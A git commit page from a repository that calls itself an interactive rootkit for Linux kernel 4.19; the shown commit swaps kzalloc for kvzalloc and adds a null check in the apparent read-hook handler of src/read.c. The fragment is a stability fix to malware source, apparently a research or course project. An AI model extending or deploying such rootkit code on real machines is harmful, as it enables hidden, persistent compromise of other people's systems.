linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 6b329999ce0c9f531c19ef04e60d5f691be35b21
parent b19cc27f9a6cafa8c41ac305443837f10a4d3007
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 18:46:56 +0100

Don't crash on large buffer allocations

Diffstat:
Msrc/read.c | 10+++++++++-
1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/src/read.c b/src/read.c @@ -121,7 +121,15 @@ handle_compare(char *buf, pid_t pid, size_t size) void handle_pid(pid_t pid, __user char *buf, size_t size) { - char *str = kzalloc(size, GFP_KERNEL); + //Sometimes (e.g. when installing packages), kalloc fails + //To avoid being limited by the page size, we use kvzalloc, + //which allocates chunks bigger than the page size if necessary + //https://lwn.net/Articles/711653/ + char *str = kvzalloc(size, GFP_KERNEL); + + if(!str) + return; + copy_from_user(str, buf, size); //Early return on exact match, avoiding more expensive operations